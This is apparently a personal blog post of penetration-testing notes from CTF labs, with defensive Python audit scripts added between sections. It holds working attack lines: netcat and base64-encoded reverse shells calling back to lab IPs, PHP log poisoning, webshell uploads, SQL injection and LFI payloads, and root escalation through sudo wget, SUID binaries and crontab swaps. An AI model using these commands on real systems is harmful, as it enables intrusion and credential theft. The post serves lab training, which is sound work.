I spent most of 2021 either racing mountain bikes, training to race or hacking virtual machines on Offensive Computing’s Proving Grounds or TryHackMe.com.

Here are some random tactics I picked up along the way.

Enjoi!
Greg

– If you ever see /usr/bin/bash with SUID bit set, run bash -p to get root. How is that even possible?
– Search for SUID bits set on binaries you can execute as root for priv escalation
– Search for id_rsa, private certs with which you can escalate privileges.
– Scan robots, dirb directories, html/php source code for usernames or passwords or base64 strings you can decode
– Add some of these to a script you can paste into a system to search recursively for such SUID files, certs and the like.
– Be alert for potential usernames anywhere, base64 encoded strings, robots, html/php/other code strings. Usernames!
– Try ssh-ing/ftp-ing into boxes with found usernames and potential passwords, or hydra the services for brute-force access.
– You can ssh back into a box with private keys (id_rsa), root at best.
– If sudo allows wget, you can fetch a file to any path with root privs without the root password.
– Linux lets us authenticate using a password hash that’s in /etc/passwd as well as /etc/shadow.
– Key command, while logged on as an unprivileged user: $ sudo wget 1.2.3.4/passwd -O /etc/passwd, then su to root.
– You can generate passwords like those in /etc/shadow using mkpasswd command.
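The /etc/passwd trick above cuts both ways: the same field that lets an attacker drop a hash in also makes the problem easy to spot. Here is an added example (not part of the original notes) that audits passwd-format text for a hash sitting in field 2 and for extra UID 0 accounts. The sample file content is constructed; the $1$hack$... hash is the one the openssl note further down produces.

```python
# Added example (not part of the original notes): audit /etc/passwd text for
# a password hash stored directly in field 2 instead of the "x" placeholder,
# and for accounts other than root with UID 0.

# Constructed sample passwd content for the demo.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
greg:x:1000:1000:Greg:/home/greg:/bin/bash
backup:$1$hack$22.CgYt2uMolqeatCk9ih/:0:0:Backup:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
"""

def parse_passwd(text):
    """Yield (name, pw_field, uid, shell) for each well-formed passwd line."""
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, pw, uid, _gid, _gecos, _home, shell = fields
        try:
            yield name, pw, int(uid), shell
        except ValueError:
            continue

def audit_passwd(text):
    """Return a list of (account, reason) findings for passwd-format text."""
    findings = []
    for name, pw, uid, shell in parse_passwd(text):
        # "x" means the hash lives in /etc/shadow; "*" or "!..." means locked.
        # Anything else is an empty password or a hash any local user can
        # read and try to crack, and it overrides the shadow entry.
        if pw == "":
            findings.append((name, "empty password field"))
        elif pw not in ("x", "*") and not pw.startswith("!"):
            findings.append((name, "password hash stored in /etc/passwd"))
        if uid == 0 and name != "root":
            findings.append((name, "extra UID 0 account"))
    return findings

def audit_passwd_file(path="/etc/passwd"):
    """Run the audit against a real passwd file."""
    with open(path, encoding="utf-8", errors="replace") as f:
        return audit_passwd(f.read())

if __name__ == "__main__":
    for account, reason in audit_passwd(SAMPLE_PASSWD):
        print(f"{account}: {reason}")
```

Running it on the sample flags the backup account twice: once for the hash and once for UID 0. Diffing /etc/passwd against a known-good copy after an engagement (or on a cron schedule) catches the sudo wget swap described above.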
– searchsploit [keyword] to find vulns or search CVEs or exploithub or wherever. Use against local or remote
– nc -lvp 4444 to setup nc listener for the target to connect back to you on as with a python reverse shell.
– Check /tmp for fishiness. Stuff gets placed there by attackers b/c it’s world-writable.
– If you’re ssh-ed in, paste linenum.sh into the box and run it to gather local intel. Great tool.
– Check /etc/crontab to see what processes are running out of the ordinary. Can contain passwords in scripts set to run.
– Swap out (If possible) scripts which run as root from crontab with your own like add you to gid0 or create a new account with creds you set.
– You can call into a server with bad php: http://192.168.175.72:8593/?book=../../../../../var/log/apache2/access.log or error.log
– Entries in /etc/crontab can be hidden from view depending on crlf or end of line entry. Reveal by pasting into vi or other editor
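The two crontab notes above (root jobs that run a script you can replace, and entries hidden behind a carriage return) are easy to check for programmatically. Here is an added example (not part of the original notes) that parses system-crontab text, reports anything hidden after a CR, and flags root jobs whose script is writable by group or others. The crontab text is constructed, and the writability check is passed in as a function so the demo runs without touching the disk; audit_crontab_file() uses the real filesystem.

```python
# Added example (not part of the original notes): audit system crontab text
# for entries hidden behind "\r" (cron reads them, a plain "cat" overwrites
# them on screen) and for root jobs that run a script other users can edit.
import os
import shlex
import stat

# Constructed sample: the last job line hides a second command behind \r.
SAMPLE_CRONTAB = (
    "SHELL=/bin/sh\n"
    "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
    "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n"
    "*/5 * * * * root /usr/local/bin/backup.sh\n"
    "* * * * * root /opt/monitor/check.sh\r*/1 * * * * root /tmp/.x/run.sh\n"
)

def _first_path(command):
    """Return the first absolute path token in a cron command string, if any."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        tokens = command.split()
    for tok in tokens:
        if tok.startswith("/") and len(tok) > 1:
            return tok
    return None

def audit_crontab(text, is_writable_by_others):
    """Return (line_no, reason, detail) findings for system crontab text.

    is_writable_by_others(path) -> bool is supplied by the caller.
    """
    findings = []
    for line_no, raw in enumerate(text.split("\n"), start=1):
        if "\r" in raw:
            hidden = raw.split("\r", 1)[1].strip()
            findings.append((line_no, "hidden entry after CR", hidden))
        for entry in raw.split("\r"):
            entry = entry.strip()
            if not entry or entry.startswith("#"):
                continue
            if "=" in entry.split()[0]:
                continue  # variable assignment such as SHELL=/bin/sh
            parts = entry.split(None, 6)
            if len(parts) < 7:
                continue  # @reboot-style lines are not handled in this demo
            user, command = parts[5], parts[6]
            path = _first_path(command)
            if user == "root" and path and is_writable_by_others(path):
                findings.append((line_no, "root job runs writable script", path))
    return findings

def _group_or_world_writable(path):
    try:
        mode = os.lstat(path).st_mode
    except OSError:
        return False
    return bool(mode & (stat.S_IWOTH | stat.S_IWGRP))

def audit_crontab_file(path="/etc/crontab"):
    # Read as bytes so universal-newline translation cannot hide the "\r".
    with open(path, "rb") as f:
        text = f.read().decode("utf-8", "replace")
    return audit_crontab(text, _group_or_world_writable)

if __name__ == "__main__":
    demo_writable = lambda p: p.startswith("/tmp/")
    for finding in audit_crontab(SAMPLE_CRONTAB, demo_writable):
        print(finding)
```

On the sample, line 5 is reported twice: once for the hidden entry and once because the hidden job runs a script under /tmp. Run audit_crontab_file() as part of a baseline check and you do not need a hex editor to find the CR trick.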
– Check gobuster.out for interesting hidden directories or filenames. like /secret or whatever
– Always try default credentials like admin/admin, root/toor etc. Or google search for default creds for the software you’re seeing.
– Try SQL vuln elicit with: ' or 1=1; -- or http://192.168.120.224/store/book.php?bookisbn=%27%20or%201=1;%20--
– .php files let you add strings onto the end of URLs for command injection or like cat /etc/shadow and if web service is running as root, it works.
– Try sqlmap -u http://1.2.3.4/secret.php?number= --dump-all --batch -D store (store being the database)
– Connect with mysql or do password guessing with hydra or medusa
– show databases; show tables; select * from <table>; Find the password table for hashes to crack with john or crackstation
– LFI – Local File Include is where we somehow get files onto the box, then call them through the include and they get executed with the privs of the web service account, like apache.
– shodan catalogs the hashes of favicons and you can search by hash to see which sites are using your favicon or which are scam sites.
– Like, $cp /usr/share/webshells/php/php-reverse-shell.php. Edit with your ip/open port and run the reverse php shell and it connects back to you.
– If you try to get the robots.txt file and it says no b/c you’re not a search engine, curl supports declaring your User-Agent string to be a permitted search engine.
– find / | grep pass to search the entire system for password files or similar. Pivot!
– Don’t forget to pivot to other boxes on the remote network, if it exists.
– If you see a random blob of characters, look closely in it to find patterns which could be usable like aaAdDdddd”password”d0dlpwpekxwd
– While this file only seems to contain random text at first sight, we can identify some important parts between double quotes.
– Be alert for chunks of strings of characters which, when strung together, may be a hash or base64 encoding. Deception VM on PG had 3 separate fragments
appearing on different lines. The expectation was that we string them back together for the SSH password. Username found in wpscan vs wordpress.
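Spotting hashes and base64 in a blob by eye, as the last few notes describe, gets old fast. Here is an added example (not part of the original notes) that serves both this note and the base64/hash notes further down: it pulls crypt-style password hashes and base64-looking words out of text and tries to decode the base64 to printable text, so noise that happens to be valid base64 is shown as undecodable rather than mistaken for a secret. The blob is constructed; the $1$hack$... hash is the one the openssl note produces, and aHVudGVyMg== is a constructed token.

```python
# Added example (not part of the original notes): find crypt-style password
# hashes and base64-looking tokens in a blob of text and try to decode the
# latter. A practitioner reviews the output rather than trusting every hit.
import base64
import binascii
import re

# Crypt(3)-style hashes: $1$ md5crypt, $5$/$6$ sha-crypt, $2a/b/y$ bcrypt,
# $P$/$H$ phpass (WordPress), $y$ yescrypt.
HASH_RE = re.compile(r"\$(?:1|2[aby]?|5|6|7|y|P|H)\$[A-Za-z0-9./$]{8,}")

# Base64 words of at least 8 chars in whole 4-char groups, optional padding,
# not glued to other base64 characters on either side.
B64_RE = re.compile(
    r"(?<![A-Za-z0-9+/])"
    r"(?:[A-Za-z0-9+/]{4}){2,}(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?"
    r"(?![A-Za-z0-9+/=])"
)

def _try_base64(token):
    """Return decoded text if the token is valid base64 yielding printable text."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if text and all(c.isprintable() or c in "\r\n\t" for c in text):
        return text
    return None

def find_encoded_tokens(blob):
    """Return a list of (kind, token, decoded_or_None) found in the blob."""
    found = []
    for m in HASH_RE.finditer(blob):
        found.append(("hash", m.group(0), None))
    for m in B64_RE.finditer(blob):
        token = m.group(0)
        found.append(("base64", token, _try_base64(token)))
    return found

# Constructed sample: line noise with a hash and a base64 string buried in it.
SAMPLE_BLOB = (
    'aaAdDdddd"password"d0dlpwpekxwd\n'
    'x-backup-user: $1$hack$22.CgYt2uMolqeatCk9ih/ expires=never\n'
    'token=aHVudGVyMg== ; session=ZZZZ\n'
)

if __name__ == "__main__":
    for kind, token, decoded in find_encoded_tokens(SAMPLE_BLOB):
        print(f"{kind:7} {token} -> {decoded}")
```

Two of the base64 hits ("password" and the junk after it) are valid base64 but decode to binary, so they come back as None; the token on line 3 decodes cleanly. Pipe a config dump or the output of strings through this and the double-quoted fragments the note mentions stand out on their own line.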
– In metasploit, searchsploit to find exploit, then $cp /usr/share/exploitdb/platform/windows/remote/3996.c /root/3996.c. Compile and run.
– $ sudo -l to enumerate what the user is able to run on an ssh term. sudo -l lists paths with potential suid bits set to run with root privs.
– /usr/bin/time /bin/sh for priv escalation. Maybe script a bunch of those to execute to attempt priv escalation
– Using a SUID binary, try:
$ LFILE=/etc/shadow
$ sudo /usr/bin/SUID-BINARY --raw -F "$LFILE"
(Prints "Failed to resolve host" yet still dumps /etc/shadow for cracking)
– dirb http://192.168.0.27 -X .zip (Find files with this eXtension)
– LFI with http://192.168.120.170/console/file.php?file=/etc/passwd or shadow
– Dirb can reveal useful php or directories for these LFI attempts.
– View for poisoning auth.log: 192.168.1.129/lfi/lfi.php?file=/var/log/auth.log
– ssh '<?php system($_GET["cmd"]); ?>'@192.168.120.170 [See how that tacks a command injection string into the ssh command]
– Navigating to manipulated URLs can cause the web server to execute files you uploaded in the LFI and reconnect back to you for remote shell.
– Check your privileges, whatever they are. If you can compromise a seemingly unpriv-ed account, you may have access to things like services or ?
– $sudo -l (List privs) Responds with “you may run the following commands
– If your shell seems constricted by chroot or you have no path statements, you can /usr/bin/ls (absolutes) or make path statements
– Escalation: you can pipe scripts into binaries, including nmap, that can spawn /bin/sh:
$ TF=$(mktemp)   # for example
$ echo 'os.execute("/bin/sh")' > $TF
$ sudo -u root nmap --script=$TF
This executes the shell with the root privs you got from running nmap via sudo.
– If you’re in a restricted shell, try $ bash --noprofile. Seems to clear that up.
– If you’re stuck on some unknown port with no identifiable service, try fuzzing:
– sfuzz -S 192.168.1.1 -p 10443 -T -f /usr/share/sfuzz/sfuzz-sample/basic.http or other type. Might reveal some useful info

Misc Linux Hacknotes:
– /var/ftp/ is the default location for ftp files you upload so you can call a php reverse shell. Wrote to /var/ftp/pub/ on inclusiveness
– /etc/passwd can actually contain hashes. Crack when found
– gobuster or dirb to brute force hidden directories or objects. Good for finding web objects for uploading files for remote code execution
– wordlists on kali are stored in /usr/share/wordlists/
– start netcat listener with #nc -nvlp [port], usage #nc -nvlp 4444
– Kali stores webshells here /usr/share/webshells. Notably, like php-reverse-shell.php. Edit for usage top 10 lines
– When guessing passwords, try the username as a pass, or use cewl to augment wordlists for hydra brute forcing
– #tshark is like tcpdump
– Use apt list --installed to see what’s installed in debian
– If you have a web form and have restrictions on input, you can base64 encode the input and have the remote system decode and execute it:
– 127.0.0.1 | echo cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1JIDI+JjF8bmMgMTkyLjE2OC4xMzYuMTUgODAgPi90bXAvZgo= |base64 -d | bash
– If you decode this string, you’ll see that it is a reverse shell back to tcp/80
– Use the stat command to view extended file info
– you can hide /etc/crontab entries with an EOL/CRLF character. View hidden ones with $ hexeditor
– use dpkg --list to view installed apps
– tail -f /var/log/syslog shows repeated errors with the expressvpn.service daemon
– /etc/systemd/system/expressvpn.service
– #systemctl stop expressvpn.service seems to have killed it
– #systemctl disable expressvpn.service
– Response: Removed /etc/systemd/system/multi-user.target.wants/expressvpn.service
– Errors in /var/log/syslog for expressvpn ended
– systemctl status expressvpn.service
– Imagine a captcha is stopping you from logging in, view source, find captcha.php and sometimes the value is in the source code. Duh.
– git clone http://github.com/openwall/john would copy JTR to your local machine.
– From there, cd into john/src, ./configure, make,  make install
– Didn’t seem to run right but that’s how you do that. Didn’t put anything into my path to execute though.
– zip2john is a password cracker for zip files. Don’t have to brute force those.
– In /etc/passwd a default shell of /bin/rbash means restricted bash.
– You’d have to escape that but you can run software outside your path so that will be easy.
– Try ssh username@1.2.3.4 -t "bash --noprofile" and try using full paths to binaries like /usr/bin/cat or whatever (Worked)
– Get attackable VMs from: https://www.vulnhub.com/
– You can ‘strings’ binaries looking for ASCII characters to gather intel about the file
– $ls -al /tmp to see what’s going on in there. Got a base64 string from a tmp file I opened
– #chkrootkit to check for rootkit activity or evidence
– responder.py listens on the local network for LLMNR (Link-Local Multicast Name Resolution) broadcasts and gathers up hashes for local cracking and reuse
– Search for vulns in metasploit. Example msf > use auxiliary/admin/http/wp_google_maps_sqli
– Check for ability to upload and execute files via url like http://1.2.3.3/upload_dir/exploit.php
– If TCP/3306 is open, it’s MySQL. You can connect with #mysql -u root -p -h 1.2.3.3 and dig for usernames/passes.
– Base64 encoding: if you see a string of text like this 'Sld6WHVCSkpOeQ==', it may be base64 encoded
– echo 'Sld6WHVCSkpOeQ==' | base64 -d (or --decode)
– Sometimes passwords are hidden in plain sight.
– Other times, a pass hash looks like $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1
– Save to hashfile.txt and $john hashfile.txt to crack it.
– If you find passes anywhere, try logging in anywhere with them to escalate privileges.
– In a ls command, check file ownership for usernames or /etc/password or /home/username
– Make copies of files while you have root shell and chmod 666 them so you don’t lose access.
– LFI – Local File Include:
http://192.168.120.45/?page=php://filter/convert.base64-encode/resource=config
– This says "hey server, open this file I have." More on offensive-security.com. Study.
– Practice on DVWA.
– Check all web content to which you have access. One VM had admin credentials in cleartext.
– If you’re restricted to uploading file types like only .jpg or .png, simply rename a .php to .jpg to upload and execute for reverse shell.
– Search metasploit for specific version numbers of software to attack. Searchsploit
– Once discovered:
msf > nmap -Pn -sS -A -oX target_db 1.2.3.0/24 (or a single host, 1.2.3.4)
msf > db_import target_db
msf > hosts (to view hosts in the target_db)
msf > db_nmap -sSV -A 1.2.3.4 (Targets from target_db)
– If you find a place to upload files, upload php reverse shells, then call them via URL:
– First, start a netcat listener with #nc -lvp 4444 (any IP on 4444)
– Some VMs have file upload ability, then call via web browser
http://192.168.120.30/uploaded_files/php-reverse-shell.php (Calls the script you uploaded)
– Webshells are stored in /usr/share/webshells
– Notably php-reverse-shell.php
– Once you run the shell on the webserver, it connects back, then escalate privs.
– find / |grep txt or root or flag or whatever file anywhere on the filesystem
– Navigating to http://192.168.120.30/flag/ can grant a flag.
msf > search CVE:2008:9798 – Shows you the exploit. Select with the number next to it like msf > use 0
– Regex to find a valid IPv4 address: \b(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)\.){3}(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)\b
– amap can find services running on non-standard ports. E.g., when ssh is running on tcp/655335
– More on Kali MiniBox puter
– Format nikto output for msf import and use #nikto -h 1.2.3.4 -Format msf+
– Binaries with S bit set with #chmod +s /bin/bash are executed with root privs so that (!) $bash -p results in uid0 (root)
– nmap -p- -T4 --top-ports=5000 1.2.3.4 (Scan top 5000 ports)
– $ openssl passwd -1 -salt hack pass123
$1$hack$22.CgYt2uMolqeatCk9ih/
– zip2john is hugely faster than fcrackzip, massively.
– sqlmap.py -u "http://www.site.com/section.php?id=51" (test to see if vuln to injection)
– sqlmap -u http://192.168.75.72/index.php
– Searchsploit searches exploit-db for sploits from a cmdline. Isn’t related to msf>
– echo "GET <?php echo 'TEST123' ?> HTTP/1.1" | nc 192.168.189.72 80
– Dumps
– Poison the webserver logs with script, then call the access.log with curl! wow!
– $ echo "GET <?php system('nc -e /bin/bash 192.168.118.9 444'); ?> HTTP/1.1" | nc 192.168.175.72 80
– First, start our listener with #nc -nvlp 444
– Then trigger it with the LFI.
– $curl http://192.168.175.72:8593?book=../../../../../var/log/apache2/access.log
– We receive our shell.
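Everything in the log-poisoning sequence above leaves a trace in the very log it abuses, which makes it a good detection case. Here is an added example (not part of the original notes) that serves both the IPv4-regex note earlier and the LFI/log-poisoning notes: it parses Common Log Format lines, pulls the client address with an anchored IPv4 regex (a standard pattern, not the one in the notes), and flags requests carrying ../ traversal, php:// wrappers, a log-file path, or a PHP tag, checking the URL-decoded request as well so percent-encoding does not hide a hit. The log lines are constructed for the demo.

```python
# Added example (not part of the original notes): triage Apache-style access
# log lines for LFI and log-poisoning patterns and extract the client IPv4.
import re
from urllib.parse import unquote

# Anchored IPv4: each octet 0-255, exactly four octets.
IPV4_RE = re.compile(
    r"^(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)\.){3}(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)$"
)
# Common Log Format: client ident user [time] "request" status size
CLF_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]*)\] "([^"]*)" (\d{3}) (\S+)')

SIGNATURES = [
    ("traversal", re.compile(r"\.\./")),
    ("php wrapper", re.compile(r"php://", re.I)),
    ("php tag in request", re.compile(r"<\?(?:php|=)", re.I)),
    ("log file requested", re.compile(r"/var/log/", re.I)),
]

# Constructed sample log: one clean request, three suspicious ones, and a
# line with a malformed client address.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2021:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
10.0.0.9 - - [12/Mar/2021:10:01:09 +0000] "GET /?book=../../../../../var/log/apache2/access.log HTTP/1.1" 200 9031
10.0.0.9 - - [12/Mar/2021:10:01:15 +0000] "GET /?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 2211
10.0.0.9 - - [12/Mar/2021:10:01:20 +0000] "GET /%3C%3Fphp%20echo%20'x'%3B%20%3F%3E HTTP/1.1" 404 196
999.1.1.1 - - [12/Mar/2021:10:02:00 +0000] "GET /robots.txt HTTP/1.1" 200 44
"""

def is_ipv4(s):
    """True only for a well-formed dotted-quad IPv4 address."""
    return bool(IPV4_RE.match(s))

def triage_line(line):
    """Return (client_ip_or_None, [matched signature names]) for one log line."""
    m = CLF_RE.match(line)
    if not m:
        return None, []
    client, _ts, request, _status, _size = m.groups()
    ip = client if is_ipv4(client) else None
    # Check the raw and the URL-decoded request so encoding does not hide a hit.
    haystack = request + "\n" + unquote(request)
    hits = [name for name, rx in SIGNATURES if rx.search(haystack)]
    return ip, hits

def triage_log(text):
    """Return [(line_no, client_ip, hits)] for lines that matched a signature."""
    out = []
    for n, line in enumerate(text.splitlines(), start=1):
        ip, hits = triage_line(line)
        if hits:
            out.append((n, ip, hits))
    return out

if __name__ == "__main__":
    for n, ip, hits in triage_log(SAMPLE_LOG):
        print(f"line {n} from {ip}: {', '.join(hits)}")
```

Lines 2 to 4 of the sample are reported, each with its matching signature; the malformed 999.1.1.1 address fails the anchored regex, which the sloppier pattern in the notes would have accepted. Because a poisoned log line stays in the file, running this over access.log after the fact still shows the injection and the address it came from.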
– If you have shell on a box, check permissions on web files to see if you have write access to like index.php. Change it to escalate privs.
– If you can’t find the flag, do a # find / | grep \.txt and sort by date to find a recently-edited text file flag. dafe5f0c961a70c32fd1721cb99c7771
– If a site you’re working calls out to a non-existent domain, you can put an entry back to you in /etc/hosts so the site works. Worked on Proving Grounds Loly
– this is important and I’ve seen it on two engagements:
– The initial IP works but referer links point to some non-existent domain or localhost.
– Put an /etc/hosts entry for localhost to 192.168.X.X or whatever the target server is.
– Sweet set of password files for cracking here: /usr/share/seclists/Passwords/
– Contains leaked actual passwords
– curl -s http://192.168.53.34 | grep API = It’s a thing. Look into it.
– ffuf -w names.txt -u http://192.168.116.14/ -H "Host: FUZZ" -mc 200 (vhost fuzzing with ffuf)
– fix your limited shell with $ python -c "import pty; pty.spawn('/bin/bash')"
– fix your limited shell with $ python3 -c 'import pty; pty.spawn("/bin/bash")'

Find binaries with the suid bit set:
# find / -perm -u=s -type f 2>/dev/null
# find / -perm -4000 2>/dev/null
There are secure path statements where dangerous files aren’t executed, AND you can edit your own PATH so stuff you want gets executed first.
Add /tmp to your PATH to execute your malware before the legitimate /usr/bin/ls or whatever.
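The find commands above produce a list; the useful question is what is on it that should not be. Here is an added example (not part of the original notes) that walks a tree for setuid/setgid files the same way and compares the result with a baseline, so a setuid /usr/bin/bash or a stray binary under /opt stands out. The baseline and the sample listing are constructed; a real audit would capture the baseline from a fresh install of the same distribution.

```python
# Added example (not part of the original notes): enumerate setuid/setgid
# files and diff them against a baseline of expected setuid binaries.
import os
import stat

# Constructed baseline of setuid binaries expected on this host.
BASELINE = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/newgrp", "/usr/bin/mount", "/usr/bin/umount",
}
# Basenames that should never carry setuid, even if a baseline lists them.
INTERPRETERS = {"bash", "sh", "dash", "zsh", "python", "python3", "perl", "ruby", "nmap", "time"}
# Pseudo filesystems that never hold real binaries.
SKIP_DIRS = ("/proc", "/sys", "/dev", "/run")

def is_setuid_or_setgid(mode):
    """True when an st_mode value carries the setuid or setgid bit."""
    return bool(mode & (stat.S_ISUID | stat.S_ISGID))

def find_suid(root="/"):
    """Return sorted paths of regular files under root with setuid/setgid set."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and is_setuid_or_setgid(st.st_mode):
                hits.append(path)
    return sorted(hits)

def classify_suid(found, baseline=BASELINE):
    """Return (unexpected, interpreters): paths absent from the baseline, and
    paths whose basename is a shell or interpreter regardless of baseline."""
    unexpected = sorted(p for p in found if p not in baseline)
    interpreters = sorted(p for p in found if os.path.basename(p) in INTERPRETERS)
    return unexpected, interpreters

# Constructed listing standing in for find_suid("/") output on a bad day.
SAMPLE_FOUND = ["/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/bash", "/opt/app/helper"]

if __name__ == "__main__":
    unexpected, interp = classify_suid(SAMPLE_FOUND)
    print("not in baseline:", unexpected)
    print("setuid shells/interpreters:", interp)
```

Swap SAMPLE_FOUND for find_suid("/") to run it for real; the walk is a slower equivalent of the find commands, but the baseline comparison is what turns the list into an alert.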
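The PATH note above is the same weakness seen from the other side: if a writable directory sits ahead of the system directories, whatever lands there wins the lookup. Here is an added example (not part of the original notes) that audits a PATH value for world-writable entries, for entries placed before the system directories, and for empty or "." entries. The writability check is passed in as a function so the constructed PATH can be examined without touching the disk; audit_current_path() uses the real filesystem.

```python
# Added example (not part of the original notes): audit a PATH string for
# entries an unprivileged user could use to plant a binary that runs first.
import os
import stat

SYSTEM_DIRS = ("/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin")

def audit_path(path_value, is_world_writable):
    """Return a list of (index, entry, reason) findings for a PATH string.

    is_world_writable(path) -> bool is supplied by the caller.
    """
    findings = []
    entries = path_value.split(":")
    # Index of the first system directory; anything before it wins lookup.
    first_system = next((i for i, e in enumerate(entries) if e in SYSTEM_DIRS), len(entries))
    for i, entry in enumerate(entries):
        if entry in ("", "."):
            findings.append((i, entry, "current directory searched"))
            continue
        if not entry.startswith("/"):
            findings.append((i, entry, "relative entry"))
            continue
        if is_world_writable(entry):
            reason = "world-writable directory"
            if i < first_system:
                reason += " searched before system directories"
            findings.append((i, entry, reason))
    return findings

def _world_writable_dir(path):
    try:
        st = os.stat(path)
    except OSError:
        return False
    # The sticky bit (as on /tmp) still lets anyone create new files there.
    return stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_IWOTH)

def audit_current_path():
    """Audit the PATH of the running process against the real filesystem."""
    return audit_path(os.environ.get("PATH", ""), _world_writable_dir)

# Constructed PATH with /tmp placed ahead of the system directories.
SAMPLE_PATH = "/tmp:/home/greg/bin:/usr/local/bin:/usr/bin:/bin:."

if __name__ == "__main__":
    for finding in audit_path(SAMPLE_PATH, lambda p: p == "/tmp"):
        print(finding)
```

On the sample it reports /tmp at index 0 (writable and ahead of /usr/local/bin) and the trailing "." entry. The same check is worth running on the PATH that cron and sudo actually use, since those are the contexts where a hijacked ls runs as root.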

By Greg Miller

Ex-military cyber officer. Triathlete and mountain bike racer.